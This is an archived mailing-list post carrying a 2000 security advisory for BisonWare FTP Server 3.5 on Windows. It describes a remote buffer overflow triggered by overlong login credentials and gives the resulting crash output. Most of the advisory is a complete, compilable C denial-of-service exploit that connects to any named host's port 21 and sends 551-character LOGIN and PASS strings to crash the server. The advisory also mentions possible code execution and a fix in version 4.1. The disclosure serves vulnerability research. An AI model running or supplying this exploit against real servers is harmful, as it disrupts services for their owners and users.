This is a multi-part message in MIME format. ------=_NextPart_000_0013_01BF86DF.C624E940 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit "BisonWare is a FTP Server that runs on Windows platform. An intruder can crash the FTP remotely from outside without the need to log in. Even with no legitimate account on the system is still possible to attack the FTP server." Conde Vampiro Roses Labs / w00w00 http://www.roses-labs.com Advanced Security Research. ------=_NextPart_000_0013_01BF86DF.C624E940 Content-Type: text/plain; name="RLbison.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="RLbison.txt" Roses Labs Security Advisory ---------------------------- Author: Conde Vampiro Roses Labs Advisory Code: RLA002 Date: 2/29/2000. Software: BisonWare FTP Server V3.5 Platform: Windows 9x/NT.=20 Risk: Remote buffer overflow, that allow to crash the FTP Server. (Maybe also be possible to execute arbitrary code.) ------------ Introduction ------------ Bison FTP Server is a FTP server that runs on windows platforms. An intruder can launch an attack that will crash the FTP server. ------ Detail ------ Sending a "LOGIN" & "PASSWORD" of 550 characters each, will crash the FTP Server. This is the error that the FTP will produce: "Exception EAccessViolation in module BISONFTP.EXE at=20 0A0D4858. Access vilation at address 0A0D5858. Read of=20 address 0A0D5858." ---- Code=20 ---- Warning: Neither the Roses Labs or the author accept any responsibility of the use of this code. This code will crash the FTP server. ------- CODE START ------- /* * FILE: rlxbison.c * CODER: Conde Vampiro. * DATE: 2/29/2000. * ABSTRACT: Remote DoS of BISON FTP Server 3.5 * * Compile: gcc rlxbison.c -o rlbison * * Roses Labs / w00w00 * http://www.roses-labs.com * Advanced Security Research. */ #include <stdio.h> #include <sys/socket.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <arpa/inet.h> #include <unistd.h> /* Defines */ #define MAX 551 #define MAXDATA 1024 /* Global variables */ int sock; int i; char datacrap[MAX]; char *temp; char tempdata[MAXDATA]; char buf[MAXDATA]; struct hostent *host; struct sockaddr_in KillFTP; /* Prototypes */ unsigned long resolve(char *host_name); char *crap(int num); /* Main */ int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s <Host>\n", argv[0]); exit(-1); } KillFTP.sin_family=3DAF_INET; KillFTP.sin_addr.s_addr=3Dresolve(argv[1]); if(!KillFTP.sin_addr.s_addr) { printf("Host Unkown: %s\n",argv[1]); exit(-1); } KillFTP.sin_port=3Dhtons(21); sock=3Dsocket(AF_INET, SOCK_STREAM, 0); if(sock < 0) { printf("Error creating socket!!\n"); exit(-1); } if(!connect(sock,(struct sockaddr *)&KillFTP, sizeof(KillFTP))) = { printf("Roses Labs Bison FTP Xploit\n"); printf("Remote crashing code!!!\n"); recv(sock,tempdata,sizeof(tempdata),0); sleep(1); recv(sock,tempdata,sizeof(tempdata),0); temp=3Dcrap(MAX); sprintf(buf,"LOGIN %s\n",temp); send(sock,buf,strlen(buf),0); sprintf(buf,"PASS %s\n",temp); send(sock,buf,strlen(buf),0); printf("Host %s crashed!!\n",argv[1]); exit(0); } else { printf("Couldn't connect to %s on port 21,\n", argv[1]); exit(-1); } if(close(sock)) { printf("Error closing socket!!\n"); exit(-1); } return(0); } /* Functions */ unsigned long resolve(char *host_name) { struct in_addr addr; struct hostent *host_nam; if((addr.s_addr =3D inet_addr(host_name)) =3D=3D -1) { if(!(host_nam =3D gethostbyname(host_name))) return(0); memcpy((char *) &addr.s_addr, host_nam->h_addr, = host_nam->h_length); } return(addr.s_addr); } char *crap(int num) { for(i=3D0;i<num;i++) { datacrap[i]=3D'X'; } return(datacrap); } /* w00w00 E0F */ ------- CODE END ------- ---=09 Fix --- This problem is fixed in V4.1 out soon. ---- Note=09 ---- This bug was found using Cyber Host=20 Auditor (CHA). CHA is a security tool coded by=20 The Roses Labs to discover in a easy way DoS & possible buffer overflows. Roses Labs / w00w00 http://www.roses-labs.com Advanced Security Research. ------=_NextPart_000_0013_01BF86DF.C624E940--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:39:00 PDT